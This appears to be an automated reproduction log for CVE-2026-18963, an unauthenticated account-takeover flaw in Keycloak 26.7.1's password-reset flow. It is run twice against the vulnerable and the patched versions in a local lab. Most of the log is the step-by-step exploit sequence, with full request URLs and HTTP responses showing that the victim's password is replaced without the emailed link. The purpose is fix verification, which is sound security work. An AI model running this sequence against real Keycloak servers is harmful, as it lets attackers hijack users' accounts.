[repro 06:25:48] project cache present at /pruva/project-cache (not needed: image-based repro) [repro 06:25:48] Verifying patch presence/absence in ResetCredentialEmail.java at tested tags (fix commit cf6e4c8be318f1e38c4001730fe6db6930dad050) [repro 06:25:48] OK: tag 26.7.1 lacks the fix (vulnerable source confirmed) [repro 06:25:48] OK: tag 26.7.2 contains the fix [repro 06:25:49] vulnerable source commit: 73f08b397f193712b26d317210dce99898129709 (tag 26.7.1); fix commit: cf6e4c8be318f1e38c4001730fe6db6930dad050 [repro 06:25:49] Pulling container images (cached after first run) [repro 06:25:52] SMTP sink container started (captures the victim's reset email) [repro 06:25:52] === PHASE A: vulnerable target quay.io/keycloak/keycloak:26.7.1 === [repro 06:26:13] Keycloak ready after ~25s [repro 06:26:13] Keycloak vuln started: image=quay.io/keycloak/keycloak:26.7.1 server-version=26.7.1 [repro 06:26:15] Realm 'cvetest' provisioned (resetPasswordAllowed=true, SMTP->sink), victim user + atk-cli client created ### CVE-2026-18963 attempt role=vuln num=1 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=3PAkQmZ_Am4&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=62Hogat-NB2dEhibEsXr0ZkrhYc1HnpBxGBCvO2Swco&execution=141b34d5-d75c-4687-94d5-316ea9a43176&client_id=account&tab_id=3PAkQmZ_Am4&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=y3WEPQ8aWyIWSqqCSFZa5i9ggc65qZfSbLGS2L_GOCU&execution=141b34d5-d75c-4687-94d5-316ea9a43176&client_id=account&tab_id=3PAkQmZ_Am4&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=0 after=2 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=1 email-sent markers=0 step5 VULN-BEHAVIOR: selector re-rendered; form action now targets: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=gPN94wF-FIquONNWXJ4WcoYsmdagpuP9WjPh855jQsw&execution=0089b76d-91bc-40a1-9776-f21cd19b1cdb&client_id=account&tab_id=3PAkQmZ_Am4&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6 POST email execution (no action token) -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/login-actions/required-action?execution=UPDATE_PASSWORD&client_id=account&tab_id=3PAkQmZ_Am4&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6b password-update form fields: 7 step6b password form action: http://localhost:8080/realms/cvetest/login-actions/required-action?session_code=fAHPP5siebPtxdkOsDtgOxF0QnlmiZsD1DBapzhkbVw&execution=UPDATE_PASSWORD&client_id=account&tab_id=3PAkQmZ_Am4&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step7 new password -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/account/?session_state=NCO01CFCSCD7DWi6xcjlbs_m&iss=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Fcvetest&code=afc5fbc5-b5af-2f06-dfa8-5bee947aaa02.NCO01CFCSCD7DWi6xcjlbs_m.69e17432-7740-454c-bbc0-f8a906e59bff step7: attacker session established as 'victim' (auth code issued) step8 takeover verify: NEW password token HTTP 200 (want 200), OLD password token HTTP 400 (want !=200) RESULT: EXPLOITED - victim account password replaced without the email link (unauthenticated ATO) [repro 06:26:16] vulnerable attempt 1: EXPLOITED [repro 06:26:16] victim password reset to original -> HTTP 204 ### CVE-2026-18963 attempt role=vuln num=2 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=IO3x0jK8iIw&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=bBQlNgnXvNvP7pwBJ_-boxy9w8oEsXujtwbRNumMzYY&execution=141b34d5-d75c-4687-94d5-316ea9a43176&client_id=account&tab_id=IO3x0jK8iIw&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=-ZrXxg7P1ibhLzUEW_zvLA4jGjnU1QkhzMz0O4zq6NM&execution=141b34d5-d75c-4687-94d5-316ea9a43176&client_id=account&tab_id=IO3x0jK8iIw&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=2 after=4 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=1 email-sent markers=0 step5 VULN-BEHAVIOR: selector re-rendered; form action now targets: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=zJuBOv93DPlWTkvXT_ty30bLFEYmiDJS3HTHfrD-ppA&execution=0089b76d-91bc-40a1-9776-f21cd19b1cdb&client_id=account&tab_id=IO3x0jK8iIw&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6 POST email execution (no action token) -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/login-actions/required-action?execution=UPDATE_PASSWORD&client_id=account&tab_id=IO3x0jK8iIw&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6b password-update form fields: 7 step6b password form action: http://localhost:8080/realms/cvetest/login-actions/required-action?session_code=8ok7vR23ojESVNGL52TbN8WTD7tzq92QWVv3tZ9fMQU&execution=UPDATE_PASSWORD&client_id=account&tab_id=IO3x0jK8iIw&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step7 new password -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/account/?session_state=TrotwO33MZGkXVKap8o_vVSi&iss=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Fcvetest&code=23edf604-e556-0a97-073a-1f739a1d5ca9.TrotwO33MZGkXVKap8o_vVSi.69e17432-7740-454c-bbc0-f8a906e59bff step7: attacker session established as 'victim' (auth code issued) step8 takeover verify: NEW password token HTTP 200 (want 200), OLD password token HTTP 400 (want !=200) RESULT: EXPLOITED - victim account password replaced without the email link (unauthenticated ATO) [repro 06:26:16] vulnerable attempt 2: EXPLOITED [repro 06:26:16] victim password reset to original -> HTTP 204 [repro 06:26:16] === PHASE B: fixed target quay.io/keycloak/keycloak:26.7.2 === [repro 06:26:37] Keycloak ready after ~25s [repro 06:26:38] Keycloak fixed started: image=quay.io/keycloak/keycloak:26.7.2 server-version=26.7.2 [repro 06:26:39] Realm 'cvetest' provisioned (resetPasswordAllowed=true, SMTP->sink), victim user + atk-cli client created ### CVE-2026-18963 attempt role=fixed num=1 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=E11BCjQtM2I&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=9gL24JBjhOnthR7DW2LgWMPRTYtjAqls1tJk9nuwSbw&execution=d68580a1-ce3d-44d1-98c9-30f5a95a65f0&client_id=account&tab_id=E11BCjQtM2I&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=MNYSold6PTyNEFRqPF0eJAvlmREx2eDxH1KyKRPxk94&execution=d68580a1-ce3d-44d1-98c9-30f5a95a65f0&client_id=account&tab_id=E11BCjQtM2I&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=4 after=6 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=0 email-sent markers=1 step5 FIXED-BEHAVIOR: selector screen NOT re-rendered; flow still waits for the email fixed verify: old-password token HTTP 200 (want 200), new-password token HTTP 400 (want !=200) RESULT: BLOCKED (fix confirmed) [repro 06:26:40] fixed attempt 1: BLOCKED (fix confirmed) [repro 06:26:40] victim password reset to original -> HTTP 204 ### CVE-2026-18963 attempt role=fixed num=2 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=U6wMjOixxG0&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=pKI1CPiHrIDYdEfdX1s7GeCxXGvGEyuAT1SZCHT4wYE&execution=d68580a1-ce3d-44d1-98c9-30f5a95a65f0&client_id=account&tab_id=U6wMjOixxG0&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=xWImrt6IKgVdc2sAMiKodeF37cUBj4QQMMWrHgdF_dk&execution=d68580a1-ce3d-44d1-98c9-30f5a95a65f0&client_id=account&tab_id=U6wMjOixxG0&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=8 after=10 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=0 email-sent markers=1 step5 FIXED-BEHAVIOR: selector screen NOT re-rendered; flow still waits for the email fixed verify: old-password token HTTP 200 (want 200), new-password token HTTP 400 (want !=200) RESULT: BLOCKED (fix confirmed) [repro 06:26:41] fixed attempt 2: BLOCKED (fix confirmed) [repro 06:26:41] victim password reset to original -> HTTP 204 [repro 06:26:41] === SUMMARY: vulnerable exploited 2/2, fixed blocked 2/2 === [repro 06:26:41] CVE-2026-18963 CONFIRMED: unauthenticated account takeover via reset-credentials flow pivot [repro 06:26:41] runtime_manifest.json written (overall=confirmed) [repro 06:27:52] project cache present at /pruva/project-cache (not needed: image-based repro) [repro 06:27:52] Verifying patch presence/absence in ResetCredentialEmail.java at tested tags (fix commit cf6e4c8be318f1e38c4001730fe6db6930dad050) [repro 06:27:53] OK: tag 26.7.1 lacks the fix (vulnerable source confirmed) [repro 06:27:53] OK: tag 26.7.2 contains the fix [repro 06:27:54] vulnerable source commit: 73f08b397f193712b26d317210dce99898129709 (tag 26.7.1); fix commit: cf6e4c8be318f1e38c4001730fe6db6930dad050 [repro 06:27:54] Pulling container images (cached after first run) [repro 06:27:58] SMTP sink container started (captures the victim's reset email) [repro 06:27:58] === PHASE A: vulnerable target quay.io/keycloak/keycloak:26.7.1 === [repro 06:28:18] Keycloak ready after ~25s [repro 06:28:19] Keycloak vuln started: image=quay.io/keycloak/keycloak:26.7.1 server-version=26.7.1 [repro 06:28:20] Realm 'cvetest' provisioned (resetPasswordAllowed=true, SMTP->sink), victim user + atk-cli client created ### CVE-2026-18963 attempt role=vuln num=1 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=k_LZLgmkTC8&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=4buHhkghfKVF0RRR1Hr3IvQ7IGh3i3f_mdERhhCmDZM&execution=a469d656-017a-428a-9b5b-cee0a2f88064&client_id=account&tab_id=k_LZLgmkTC8&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=iKBCGkZNRBSy-UC1j58xJJqWrHS_7jVeXSzTywWebIE&execution=a469d656-017a-428a-9b5b-cee0a2f88064&client_id=account&tab_id=k_LZLgmkTC8&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=0 after=2 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=1 email-sent markers=0 step5 VULN-BEHAVIOR: selector re-rendered; form action now targets: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=8AAcXOXoZouP-vE4pIeou3pMm1QqjbWGO_OyUXzP2vU&execution=890e68e8-971e-4553-be01-f95cd4c317ea&client_id=account&tab_id=k_LZLgmkTC8&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6 POST email execution (no action token) -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/login-actions/required-action?execution=UPDATE_PASSWORD&client_id=account&tab_id=k_LZLgmkTC8&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6b password-update form fields: 7 step6b password form action: http://localhost:8080/realms/cvetest/login-actions/required-action?session_code=oebhhRvcPpfpRNd0X-Yw4zZ19xpKuQFMcHRbf8JC_SA&execution=UPDATE_PASSWORD&client_id=account&tab_id=k_LZLgmkTC8&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step7 new password -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/account/?session_state=lOGhTCukKtRcubCZzKWDG0UP&iss=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Fcvetest&code=73695363-672b-bf76-974e-7fb7dd7f3642.lOGhTCukKtRcubCZzKWDG0UP.0e71ebde-ebd9-4c38-ad67-90604d5a470d step7: attacker session established as 'victim' (auth code issued) step8 takeover verify: NEW password token HTTP 200 (want 200), OLD password token HTTP 400 (want !=200) RESULT: EXPLOITED - victim account password replaced without the email link (unauthenticated ATO) [repro 06:28:21] vulnerable attempt 1: EXPLOITED [repro 06:28:22] victim password reset to original -> HTTP 204 ### CVE-2026-18963 attempt role=vuln num=2 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=xUo6m-SUZbk&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=g_CZap4S0jRIdl139d9tVFlItkV4sIw7w-82lDLbADY&execution=a469d656-017a-428a-9b5b-cee0a2f88064&client_id=account&tab_id=xUo6m-SUZbk&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=oDO5w41KHJOxE7PebvAcnWewfmywtZ3S4U_ElmCasJ4&execution=a469d656-017a-428a-9b5b-cee0a2f88064&client_id=account&tab_id=xUo6m-SUZbk&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=2 after=4 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=1 email-sent markers=0 step5 VULN-BEHAVIOR: selector re-rendered; form action now targets: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=c4pC5xqVjptOktA_xGJA6odNrRzJ8FnQ6cNFu0M8Ev0&execution=890e68e8-971e-4553-be01-f95cd4c317ea&client_id=account&tab_id=xUo6m-SUZbk&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6 POST email execution (no action token) -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/login-actions/required-action?execution=UPDATE_PASSWORD&client_id=account&tab_id=xUo6m-SUZbk&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step6b password-update form fields: 7 step6b password form action: http://localhost:8080/realms/cvetest/login-actions/required-action?session_code=NcfyFtOT7Md8RvcXnI4XApbOPq_pJhhyd1HQqG0DmpU&execution=UPDATE_PASSWORD&client_id=account&tab_id=xUo6m-SUZbk&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step7 new password -> HTTP/1.1 302 Found Location: http://localhost:8080/realms/cvetest/account/?session_state=wfFpWi01BoZoXJSueCjs9FCO&iss=http%3A%2F%2Flocalhost%3A8080%2Frealms%2Fcvetest&code=8e37f1c1-deaf-2708-9d7e-a356dd194e97.wfFpWi01BoZoXJSueCjs9FCO.0e71ebde-ebd9-4c38-ad67-90604d5a470d step7: attacker session established as 'victim' (auth code issued) step8 takeover verify: NEW password token HTTP 200 (want 200), OLD password token HTTP 400 (want !=200) RESULT: EXPLOITED - victim account password replaced without the email link (unauthenticated ATO) [repro 06:28:22] vulnerable attempt 2: EXPLOITED [repro 06:28:22] victim password reset to original -> HTTP 204 [repro 06:28:22] === PHASE B: fixed target quay.io/keycloak/keycloak:26.7.2 === [repro 06:28:48] Keycloak ready after ~30s [repro 06:28:49] Keycloak fixed started: image=quay.io/keycloak/keycloak:26.7.2 server-version=26.7.2 [repro 06:28:50] Realm 'cvetest' provisioned (resetPasswordAllowed=true, SMTP->sink), victim user + atk-cli client created ### CVE-2026-18963 attempt role=fixed num=1 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=C5nzIDp41LQ&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=4LW2oD5uI8u9q3mBLBwGeLF_w5V6fxW7hG_P_Qki4Ok&execution=97238d1c-c9bd-4951-b8df-561d7eb02e65&client_id=account&tab_id=C5nzIDp41LQ&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=rh_j8PLdx20rkTyinj9YHoeVzRD_FxjLB9QL9j6LiGw&execution=97238d1c-c9bd-4951-b8df-561d7eb02e65&client_id=account&tab_id=C5nzIDp41LQ&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=4 after=6 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=0 email-sent markers=1 step5 FIXED-BEHAVIOR: selector screen NOT re-rendered; flow still waits for the email fixed verify: old-password token HTTP 200 (want 200), new-password token HTTP 400 (want !=200) RESULT: BLOCKED (fix confirmed) [repro 06:28:51] fixed attempt 1: BLOCKED (fix confirmed) [repro 06:28:51] victim password reset to original -> HTTP 204 ### CVE-2026-18963 attempt role=fixed num=2 step1 forgot-password URL: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?client_id=account&tab_id=ZJRYt4miFBs&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step2 choose-user form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=y7g6r-iwUpkzOWfNg-WAMH8MF6ozoCwM9pOJvRwGe6c&execution=97238d1c-c9bd-4951-b8df-561d7eb02e65&client_id=account&tab_id=ZJRYt4miFBs&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step3 tryAnotherWay -> selector screen markers: 1 step3 selector form action: http://localhost:8080/realms/cvetest/login-actions/reset-credentials?session_code=fhW4yIOktBP8iEMGfvTU-N4MmA7tDgx2PhwdI2HK96g&execution=97238d1c-c9bd-4951-b8df-561d7eb02e65&client_id=account&tab_id=ZJRYt4miFBs&client_data=eyJydSI6Imh0dHA6Ly9sb2NhbGhvc3Q6ODA4MC9yZWFsbXMvY3ZldGVzdC9hY2NvdW50LyIsInJ0IjoiY29kZSJ9 step4 username=victim -> email-sent page markers: 1 step4 smtp action-token links captured: before=8 after=10 step4 NOTE: the action-token link went to victim@cvetest.local only; the attacker never sees it step5 GET refresh -> selector markers=0 email-sent markers=1 step5 FIXED-BEHAVIOR: selector screen NOT re-rendered; flow still waits for the email fixed verify: old-password token HTTP 200 (want 200), new-password token HTTP 400 (want !=200) RESULT: BLOCKED (fix confirmed) [repro 06:28:51] fixed attempt 2: BLOCKED (fix confirmed) [repro 06:28:51] victim password reset to original -> HTTP 204 [repro 06:28:52] === SUMMARY: vulnerable exploited 2/2, fixed blocked 2/2 === [repro 06:28:52] CVE-2026-18963 CONFIRMED: unauthenticated account takeover via reset-credentials flow pivot [repro 06:28:52] runtime_manifest.json written (overall=confirmed)